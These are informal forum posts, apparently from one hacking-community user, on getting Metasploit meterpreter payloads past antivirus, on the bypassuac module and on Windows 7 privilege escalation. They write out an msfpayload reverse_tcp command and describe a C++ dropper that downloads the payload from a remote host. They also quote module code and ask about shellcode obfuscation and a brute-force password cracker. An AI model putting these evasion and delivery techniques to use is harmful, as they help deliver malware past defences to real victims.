bobbyb1980

This is what that Facebook guy did recently to get around paying taxes. Hopefully he took into consideration that when he tries to attend the board meeting in LA or NYC with his new passport, Customs is rightfully going to say "LOL NO THX BYE".

Don't do web design but I do enjoy downloading various payload's through the different browsers to see which built in anti viruses detect what. Surprisingly, from what little testing I've done, Internet Explorer catches more payloads than Firefox and Chrome. Firefox has pretty horrible built in virus detection (doesn't even pick up compiled msf shellcode), and found that Chrome was mediocre and had similar detection rates as ESET would.

My first language was Python and I thought it was great. What I like most about it is that it's object oriented, has a very easy to read syntax, and it has a lot of real world applications.

Digip, come here man, give me a hug : ) I know you're just trying to help and that is GREATLY appreciated. I'm like you and have the tendancy to think in a million different directions, sometimes I even have problems verbalizing what I think. I apologize for my prior attitude, I was just frustrated with your well intentioned advice. I've been studying a lot of C++ lately and it's turned me into an uptight prick, I realize this when my wife and people on internet forums say the same thing about me :P But either way, I was wrong, we are both hackers and strive for the same thing and should always be mutually respectful of each other. I believe you are still under the impression that I still don't have it working - it's working for me I just had to do things customly. To my understanding, the SET payload is executing a .bin from within another executable which is what I ended up doing to get it working. To my understand (which could very well be wrong), the inherent exploit (certificate) is still vulnerable, but like always the AV gets in the way of things (depending what AV you're using). So possibly for someone using a weak AV like ESET it could work fine, but if they're using Kaspersky it could be problematic.

And for the record, even with the SET payload - it's being written to disk. I actually used a very similar approach to get around the anti-virus which was writting a C++ program that downloads the meterpreter binary (the output of ./msfpayload windows/meterpreter/reverse_tcp LHOST=... LPORT=... R > payload.bin and encoded in a particular way which I'm not going to post here) which currently the av's do not pick up, and runs it from the .exe. If you want to know more - www.kokoromi.org/wp-content/themes/kokoromi/body.htmlcont. The .exe downloads it from a remote host and when it's written to disk, because it's a .bin that excludes those null bytes the AV is looking for, AV isn't picking it up. The SET payload appears to be doing something very similar (executing a binary obtained from the internet from within another executable) hence evading the AV. Either way, during both procedures data is being written to disk

If I'm a dick - it's because I don't like taking bogus advice ; P Since "His payloads and shell code all run in memory."... and "they never touch disk and run from memory, which is also why his stuff evades 99% of all anti-virus."... than what is the following code about taken from bypassuac.rb... print_status("Uploading the bypass UAC executable to the filesystem...") .... # Upload the payload to the filesystem # tempexe = tmpdir + "\\" + tempexe_name fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close rescue ::Exception => e print_error("Error uploading file #{filename}: #{e.class} #{e}") return ... ... # delete the uac bypass payload delete_file = "cmd.exe /c del #{tmpdir}\\#{filename}" That looks like something is being written to the disk to me... p.s - bypassuac isn't only Kennedy, it's Mitnick's work also.

I was in a class a few months ago with a guy who worked in a hospital and he told me the last guy had been fired because their data was breached. I'd put data security before other conveinciences, HIPPA is no joke.

I never get tired of hacker cat : ) http://http://cheezburger.com/4452786432

I wonder how difficult this would be to create in C++ or python? Maybe some of the more experienced coders can chime in, but all we're doing is reading stdout, and inputting value's via stdin to the "user" and "password" parameters right? Then one could code an if statement inside of an iteration that reads stdout and says something like "if stdout == 'access denied', continue trying, else return (user & pass)?? That's my vague idea, but something like that? I wouldn't know where to start, but I'd be happy to give it a shot with a little help and we could create a hak5 doc/docx password cracker : )

Get the IP(s) of the attacker(s), add them to /etc/hosts.deny or if you're using APF you could do "apf -d 207.96.146.43" ? Should probably deny traffic from offending IP's at the router via the same methods depending on the firmware. Check the logs for whichever service is being ddos'd to get the offending IP.

I got it working with my own custom payload. bypassuac is no "special shellcode" nor does it "run in memory". I don't know where you got that from. It's a regular meterpreter payload and the only obfuscation the script runs is randomizing the binary name, which is why it triggers antivirus and why it doesn't work anymore. Lol... I thought the internet was run by hamsters or whatever you said in the other thread : P

bypassuac writes to the disk...

bypassuac is a good module and with some tweaking it can work, however it won't work right out of the box. You can upload your own payload, and depending on certain variables in your environment it may/may not work. I was able to get it to work, but after a lot of customization. By default Windows Defender and/or MS Security Essentials knows that payload very well. Windows 7 seems to put in place an Ubuntu sudo style priv system which is a lot more secure than what XP uses. Even if you migrate to a system process from a limited user account, you can drop into a shell at C:\...System32 but you wont have system privs so I'm not exactly sure how you'd be getting them digi, you must have to be starting from an admin account. I don't really use SET that much anymore but I'll check out this hexdump... can you be a little more specific about what attack vector you're talking about though? I also found another way to escalate from limited user to admin by using cygwin, but it's very non practical and cygwin needs to be setup in a very specific way which probably doesn't exist outside my setup, possible though!

How would you do it for 32 bit?

In order to read the hash's you need SYSTEM privs. Yeah digi, all that script does is open a shell with whatever the current user's privs are. Windows 7 is starting to look like a halfway secure OS!

The problem I had the other day was with XP. In Windows 7 you can migrate to a system process from a limited account but it won't give you sys privs like in XP. I tried running that .bat, but in Windows 7 SP1 you can't run files as admin without an admin password. A shell pops up but nothing happens. That script works for you in Win 7 SP1 to go from a limited user acct to admin/system?

You might find this interesting if you haven't seen it already. It's a talk on binary obfuscation from Defcon that covers this topic intimiately.

Just fired up a VM of a Windows 7 SP1 fully patched machine and see that it is no longer vulnerable to admin/system level escalation attacks from a limited user account? Tried getsystem and get an access denied error, bypassuac no longer works, any ideas? Windows wins?

Well, just for the record, I can evade anti-virus successfully w/java. As someone who does pentesting, not every machine in the wild has java installed IE not every pentest is as easy as getting someone to click a link. Have to go custom here, not trying to take over the internet, just a pentest ; ) EDIT - probably shouldn't have pasted that here : ) I would love to get my hands on the book for "The Elements of Computing Systems", can you reccomend any online training courses that would perhaps serve the same purpose? As always, your responses are greatly apreciated.

It'd be nice to be able to get a shell using only javascript...

Thank you again for an insightful reply Sitwon. Why not? If I can just open a .exe in Immunity and see the assembly code in a few clicks what's to stop an anti virus from doing the same? If I understand you correctly, is this where the antivirus would be searching for nops or /x in the shellcode? And how is the antivirus seeing the shellcode if it can't see the original C code? Can you reccomend any ways to obfuscate the shellcode (which I assume must be done in the C code before compiling?) I'm starting to see that. I'm also starting to see the flip side of the coin in that no one payload is going to successfully evade all the major ant virus vendors. I'm having problems evading the same 5 or 6 anti virus vendors and they must be using the same technique and based on experimentation I can conclude that UPX or any packing to do with metasploit will set them off. I can also conclude that there are 5 or 6 that appear to be able to see shellcode coming from a mile away, irregardless of the type. I made shellcode to add a user and that was triggered. This leads me to believe it's somehow reading the assembly instructions? Any ideas for ofuscating that? Also the current shellcode I'm using (custom written oo : ) : ) :) has a lot of '/x' characters in it and I'm currently searching for a way to make it alpha numerical and compile that directly. I mean, the anti virus can't possibly be triggered by alpanumeric characters, if so then I'd imagine many typos would trigger av's? Must try harder.

OK but what do you mean scan files? If I have a .exe, is it scanning the "outside" of the .exe for certain types of packing? Or is it scanning the .asm file that was used to compile for certain behaviour? Or is it looking in the binary for certain characteristics? Or in the actual code written in C or whatever? Or searching through pasted in shellcode?

I have shellcode written in a simple C program. Before that program is run and it is scanned by anti-virus, what exact is happening? Is the antivirus listening at a firewall level for recently initiated outgoing traffic? I would imagine they aren't doing that... yet. Is the antivirus somehow scanning the original code? If so, what would it be looking for? TO my understanding certain ones look for certain packers, like UPX, and deny any program with this packing?

I'm using Virtualbox on Ubuntu and can confirm that it's crap software. Their USB functionality and shared folder functionality doesn't work.

Looked it up and found Stuxnet on metasploit... don't think the CIA/Mossad is publishing their work on metasploit but I'm sure they'd love to take credit for it : P